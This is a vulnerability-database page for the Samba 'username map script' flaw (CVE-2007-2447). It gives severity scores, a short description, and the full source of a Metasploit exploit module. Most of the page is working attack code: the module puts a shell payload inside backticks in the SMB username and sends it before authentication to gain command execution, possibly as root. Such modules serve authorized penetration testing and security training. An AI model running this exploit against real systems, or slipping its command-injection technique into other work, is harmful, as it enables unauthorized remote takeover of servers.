Samba "username map script" Command Execution

2010-02-1600:26:41

jduck <[email protected]>

www.rapid7.com

498

6 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

MEDIUM

Authentication

SINGLE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:M/Au:S/C:P/I:P/A:P

0.751 High

EPSS

Percentile

98.1%

JSON

This module exploits a command execution vulnerability in Samba versions 3.0.20 through 3.0.25rc3 when using the non-default “username map script” configuration option. By specifying a username containing shell meta characters, attackers can execute arbitrary commands. No authentication is needed to exploit this vulnerability since this option is used to map usernames prior to authentication!

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::SMB::Client

  # For our customized version of session_setup_no_ntlmssp
  CONST = Rex::Proto::SMB::Constants
  CRYPT = Rex::Proto::SMB::Crypt

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Samba "username map script" Command Execution',
      'Description'    => %q{
          This module exploits a command execution vulnerability in Samba
        versions 3.0.20 through 3.0.25rc3 when using the non-default
        "username map script" configuration option. By specifying a username
        containing shell meta characters, attackers can execute arbitrary
        commands.

        No authentication is needed to exploit this vulnerability since
        this option is used to map usernames prior to authentication!
      },
      'Author'         => [ 'jduck' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2007-2447' ],
          [ 'OSVDB', '34700' ],
          [ 'BID', '23972' ],
          [ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=534' ],
          [ 'URL', 'http://samba.org/samba/security/CVE-2007-2447.html' ]
        ],
      'Platform'       => ['unix'],
      'Arch'           => ARCH_CMD,
      'Privileged'     => true, # root or nobody user
      'Payload'        =>
        {
          'Space'    => 1024,
          'DisableNops' => true,
          'Compat'      =>
            {
              'PayloadType' => 'cmd',
              # *_perl and *_ruby work if they are installed
              # mileage may vary from system to system..
            }
        },
      'Targets'        =>
        [
          [ "Automatic", { } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => '2007-05-14'))

    register_options(
      [
        Opt::RPORT(139)
      ])

    deregister_options('SMB::ProtocolVersion')
  end


  def exploit

    vprint_status('Use Rex client (SMB1 only) since this module is not compatible with RubySMB client')
    connect(versions: [1])

    # lol?
    username = "/=`nohup " + payload.encoded + "`"
    begin
      simple.client.negotiate(false)
      simple.client.session_setup_no_ntlmssp(username, rand_text(16), datastore['SMBDomain'], false)
    rescue ::Timeout::Error, XCEPT::LoginError
      # nothing, it either worked or it didn't ;)
    end

    handler
  end
end